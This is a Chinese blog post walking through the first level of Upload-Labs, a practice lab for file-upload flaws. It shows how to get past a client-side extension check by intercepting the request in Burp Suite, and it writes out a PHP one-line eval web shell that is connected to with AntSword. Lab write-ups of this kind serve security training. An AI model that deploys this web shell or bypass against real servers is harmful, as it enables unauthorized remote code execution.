Upload-Labs-Pass-01

今日开始每日一上传，哈哈哈哈哈哈哈

环境搭建

Windows 7
phpstudy

文件上传

访问pass_01

Web Site

右击查看前端源代码,发现一段`前端验证`的`JS`代码段

<script type="text/javascript">
    function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
            alert(errMsg);
            return false;
        }
    }
</script>

简单的写一个一句话,保存为`shell.jpg`

<?php
    @eval($_POST['quail']);
?>

打开`BurpSuite`,进行抓包,将请求头的`jpg`改成`php`,放包.

BurpSuite

放完包,回到浏览器,发现出现一个撕裂的图片

上传的截图

使用蚁剑进行连接

测试连接

查看当前用户

whoami

后记

虽然这个特别简单,但是我还是想借助每题一写监督自己坚持下去,加油💪!

posted @ 2020-03-17 20:32 Quail 阅读(231) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Qu4il

鸿雁在云鱼在水，惆怅此情难寄

Upload-Labs-Pass-01

环境搭建

文件上传

访问pass_01

右击查看前端源代码,发现一段`前端验证`的`JS`代码段

简单的写一个一句话,保存为`shell.jpg`

打开`BurpSuite`,进行抓包,将请求头的`jpg`改成`php`,放包.

放完包,回到浏览器,发现出现一个撕裂的图片

使用蚁剑进行连接

查看当前用户

后记

公告

Qu4il

鸿雁在云鱼在水，惆怅此情难寄

Upload-Labs-Pass-01

环境搭建

文件上传

访问pass_01

右击查看前端源代码,发现一段前端验证的JS代码段

简单的写一个一句话,保存为shell.jpg

打开BurpSuite,进行抓包,将请求头的jpg改成php,放包.

放完包,回到浏览器,发现出现一个撕裂的图片

使用蚁剑进行连接

查看当前用户

后记

公告

右击查看前端源代码,发现一段`前端验证`的`JS`代码段

简单的写一个一句话,保存为`shell.jpg`

打开`BurpSuite`,进行抓包,将请求头的`jpg`改成`php`,放包.